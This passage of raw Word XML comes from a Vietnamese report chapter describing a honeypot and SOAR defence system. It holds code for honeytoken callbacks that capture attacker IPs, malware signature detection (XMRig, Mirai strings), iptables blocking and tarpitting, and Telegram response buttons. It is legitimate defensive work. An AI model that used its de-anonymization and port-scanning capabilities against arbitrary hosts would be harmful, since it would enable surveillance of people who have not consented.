        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:left w:val="none"/>
          <w:right w:val="none"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:left w:w="160" w:type="dxa"/>
          <w:right w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9403"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9403"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>def process_beacon_callback(self, token_id: str, request_headers: Dict, real_ip: str) -&gt; Dict:</w:t>
              <w:br/>
              <w:t xml:space="preserve">    token_info = self.active_tokens.get(token_id, {})</w:t>
              <w:br/>
              <w:t xml:space="preserve">    token_info["status"] = "TRIGGERED"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    token_info["trigger_ip"] = real_ip</w:t>
              <w:br/>
              <w:t xml:space="preserve">    token_info["user_agent"] = request_headers.get("User-Agent", "Unknown")</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    return {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        "alert": "HONEYTOKEN_TRIGGERED",</w:t>
              <w:br/>
              <w:t xml:space="preserve">        "severity": "CRITICAL",</w:t>
              <w:br/>
              <w:t xml:space="preserve">        "message": f"Kẻ tấn công đã mang tài liệu bẫy ({token_info.get('type')}) về máy thật để mở!",</w:t>
              <w:br/>
              <w:t xml:space="preserve">        "attacker_real_ip": real_ip,</w:t>
              <w:br/>
              <w:t xml:space="preserve">        "attacker_fingerprint": request_headers.get("User-Agent"),</w:t>
              <w:br/>
              <w:t xml:space="preserve">        "token_details": token_info,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hiện thực hóa cơ chế khử ẩn danh kẻ tấn công trong core/honeytoken_manager.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.6 Chi tiết Mã nguồn Phân tích Mã độc &amp; Tra cứu VirusTotal (payload_analyzer.py)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Phân hệ 'PayloadAnalyzer' sử dụng thư viện hashlib để tính toán mã băm SHA256 và MD5, đồng thời sử dụng biểu thức chính quy (Regex) quét qua chuỗi nhị phân để trích xuất địa chỉ IP C2 và URL máy chủ tải mã độc giai đoạn 2:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:left w:val="none"/>
          <w:right w:val="none"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:left w:w="160" w:type="dxa"/>
          <w:right w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9403"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9403"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>def _extract_static_iocs(self, content: bytes) -&gt; Dict[str, List[str]]:</w:t>
              <w:br/>
              <w:t xml:space="preserve">    text = content.decode("utf-8", errors="ignore")</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ip_pattern = r"\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    url_pattern = r"https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+[^\s]*"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    </w:t>
              <w:br/>
              <w:t xml:space="preserve">    ips = list(set(re.findall(ip_pattern, text)))</w:t>
              <w:br/>
              <w:t xml:space="preserve">    urls = list(set(re.findall(url_pattern, text)))</w:t>
              <w:br/>
              <w:t xml:space="preserve">    signatures = []</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if "xmrig" in text.lower():</w:t>
              <w:br/>
              <w:t xml:space="preserve">        signatures.append("Cryptocurrency Miner (XMRig / Monero)")</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if "/bin/busybox" in text or "dvrHelper" in text or "mirai" in text.lower():</w:t>
              <w:br/>
              <w:t xml:space="preserve">        signatures.append("IoT Botnet Variant (Mirai / Gafgyt)")</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return {"ips": ips, "urls": urls, "signatures": signatures}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trích xuất IOCs tĩnh và chữ ký mã độc trong core/payload_analyzer.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.7 Chi tiết Mã nguồn Động cơ SOAR Thực thi Phản ứng (soar_enforcer.py)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Lớp 'SOAREnforcer' quản lý việc chặn IP trên Tường lửa và điều hướng kết nối vào Tarpit. Module hỗ trợ kiểm tra danh sách trắng (Whitelist) để chống tự khóa nhầm máy quản trị viên và tự động xuất bản Threat Feed:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:left w:val="none"/>
          <w:right w:val="none"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:left w:w="160" w:type="dxa"/>
          <w:right w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9403"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9403"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>def block_ip(self, ip: str, duration_sec: int = 3600, reason: str = "Brute Force") -&gt; Dict:</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if ip in self.whitelist:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return {"status": "skipped", "message": "IP nằm trong Whitelist an toàn"}</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if "linux" in self.os_type:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        subprocess.run(["iptables", "-I", "INPUT", "-s", ip, "-j", "DROP"], check=True)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    self.blocked_ips[ip] = time.time() + duration_sec</w:t>
              <w:br/>
              <w:t xml:space="preserve">    self._append_to_ioc_feed(ip, reason)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return {"status": "success", "action": "FIREWALL_BLOCK", "ip": ip}</w:t>
              <w:br/>
              <w:br/>
              <w:t>def tarpit_ip(self, ip: str) -&gt; Dict:</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if "linux" in self.os_type:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        cmd = f"iptables -t nat -A PREROUTING -p tcp -s {ip} --dport 2222 -j REDIRECT --to-ports 22222"</w:t>
              <w:br/>
              <w:t xml:space="preserve">        subprocess.run(cmd.split(), capture_output=True)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return {"status": "success", "action": "TARPIT_RESOURCE_EXHAUSTION", "ip": ip}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hiện thực hóa cơ chế chặn Firewall và Tarpit trong core/soar_enforcer.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.8 Chi tiết Mã nguồn Telegram SOAR Bot tương tác 2 chiều (telegram_soar_bot.py)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Khác với các script thông báo một chiều, Telegram SOAR Bot được cài đặt luồng chạy nền (Background Polling Thread) để đón nhận các sự kiện bấm nút 'callback_query' từ phía Chuyên viên SOC và phản hồi kết quả tức thì:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:left w:val="none"/>
          <w:right w:val="none"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:left w:w="160" w:type="dxa"/>
          <w:right w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9403"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9403"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>reply_markup = {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "inline_keyboard": [</w:t>
              <w:br/>
              <w:t xml:space="preserve">        [</w:t>
              <w:br/>
              <w:t xml:space="preserve">            {"text": "🔍 Trinh sát ngược OSINT", "callback_data": f"recon:{ip}"},</w:t>
              <w:br/>
              <w:t xml:space="preserve">            {"text": "⏳ Đưa vào Tarpit", "callback_data": f"tarpit:{ip}"},</w:t>
              <w:br/>
              <w:t xml:space="preserve">        ],</w:t>
              <w:br/>
              <w:t xml:space="preserve">        [</w:t>
              <w:br/>
              <w:t xml:space="preserve">            {"text": "⛔ Chặn Firewall tức thì", "callback_data": f"block:{ip}"},</w:t>
              <w:br/>
              <w:t xml:space="preserve">            {"text": "🔓 Mở khóa IP", "callback_data": f"unblock:{ip}"},</w:t>
              <w:br/>
              <w:t xml:space="preserve">        ],</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ]</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:t>payload = {"chat_id": self.chat_id, "text": text, "parse_mode": "HTML", "reply_markup": json.dumps(reply_markup)}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Xây dựng giao diện nút bấm tương tác Inline Keyboard trong core/telegram_soar_bot.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.9 Tích hợp Hệ thống qua Phân hệ Điều phối Trung tâm (main.py)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Tệp tin 'main.py' đóng vai trò là Orchestrator trung tâm, nạp tệp tin cấu hình YAML, liên kết toàn bộ 7 phân hệ với nhau và điều phối dữ liệu từ sự kiện log tới hành động SOAR.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Bảng 4.1 tổng kết trách nhiệm và sự liên kết giữa các module trong hệ sinh thái:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="80" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="003366"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Bảng 4.1: Danh sách các Module mã nguồn và Trách nhiệm xử lý trong Hệ sinh thái</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:left w:val="none"/>
          <w:right w:val="none"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:left w:w="160" w:type="dxa"/>
          <w:right w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3134"/>
        <w:gridCol w:w="3134"/>
        <w:gridCol w:w="3134"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Module Tệp tin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Trách nhiệm Kỹ thuật Cốt lõi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Thư viện / Giao thức Chính Sử dụng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>core/cowrie_listener.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Theo dõi và phân tích luồng JSON thời gian thực từ cowrie.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>json, os, time, threading</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>core/correlation_engine.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Thuật toán cửa sổ trượt, tương quan sự kiện và ánh xạ MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>dataclasses, collections, datetime</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>core/reverse_intel.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Trinh sát ngược OSINT, tra cứu GeoIP, AbuseIPDB, Shodan và quét cổng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
